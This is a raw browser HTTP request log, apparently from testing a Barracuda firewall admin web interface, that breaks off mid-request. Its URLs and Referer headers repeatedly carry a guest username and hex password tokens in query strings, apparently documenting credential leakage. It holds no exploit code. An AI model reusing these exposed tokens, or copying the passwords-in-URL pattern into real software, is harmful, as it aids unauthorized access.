GET https://firewall.ptest.cudasvc.com/barracuda.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.271[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/ext-all.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.272[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/ext-ux.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.273[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/bfw.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.274[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.276[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/scriptaculous.js?load=effects,dragdrop&v=6.1.0.016 \
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.277[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-prototype-adapter.js?v=6.1.0.016 Load \
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.278[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-all.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.280[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js_functions.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.281[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-ux.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.281[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.helper.js?v=6.1.0.016 Load \
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.282[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.ajaxvalidation.js?v=6.1.0.016 Load \
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.284[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/utils.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.284[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/adapters/prototype-adapter.js?v=6.1.0.016 Load \
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.285[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/highcharts.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.311[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
2:35:11.368[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
2:35:11.410[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/effects.js Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.411[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/dragdrop.js Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.633[1989ms][total 1989ms] Status: 200[OK]
GET https://firewall.ptest.cudasvc.com/cgi-mod/header_logo.cgi?6.1.0.016 Load \
Flags[LOAD_NORMAL] Content Size[-1] Mime Type[image/png] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL] \
Connection[keep-alive] Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Content-Type[image/png]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Tue, 01 Oct 2013 00:35:14 GMT]
Date[Tue, 01 Oct 2013 00:35:14 GMT]
Cache-Control[no-cache, no-store]
2:35:12.070[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/edit.png Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:12.071[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/del.png Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:12.071[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/clone.png Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:12.072[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/bfw/serviceredirect.png Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:12.072[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/red.png Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:20.198[1858ms][total 2743ms] Status: 200[OK]
GET https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b496 \
95&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&up \
date_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850 \
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime \
Type[text/html] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902 \
&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL] \
Connection[keep-alive] Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Content-Type[text/html; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Mon, 01 Oct 2012 00:35:22 GMT]
Date[Tue, 01 Oct 2013 00:35:22 GMT]
2:35:20.376[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/default/grid/row-over.gif Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/css/ext-all.css?v=6.1.0.016]
2:35:22.084[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.085[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/scriptaculous.js?load=effects,dragdrop&v=6.1.0.016 \
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.086[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-prototype-adapter.js?v=6.1.0.016 Load \
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.087[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-all.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.088[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js_functions.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.089[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-ux.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.090[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.helper.js?v=6.1.0.016 Load \
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.090[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.ajaxvalidation.js?v=6.1.0.016 Load \
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.092[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/utils.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.093[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/adapters/prototype-adapter.js?v=6.1.0.016 Load \
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.094[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/highcharts.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.094[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/barracuda.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.095[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/ext-all.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
